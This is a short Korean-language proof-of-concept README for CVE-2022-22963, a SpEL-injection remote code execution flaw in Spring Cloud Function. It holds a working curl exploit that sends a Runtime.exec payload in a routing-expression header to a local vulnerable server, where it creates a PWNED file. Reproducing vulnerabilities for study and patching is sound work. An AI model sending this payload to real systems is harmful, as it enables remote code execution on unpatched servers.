
CVE-2022-22963의 SpEL 주입을 통한 Spring Cloud Function 원격 코드 실행에 대한 최소한의 개념 증명. curl과 취약한 서버를 사용한 익스플로잇을 보여줍니다.
org.springframework.cloud:spring-cloud-function-core에서 CVE-2022-22963 원격 코드 실행을 재현하기 위한 최소 예제입니다.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
익스플로잇 결과로 pom.xml 근처에 PWNED 파일이 생성됩니다.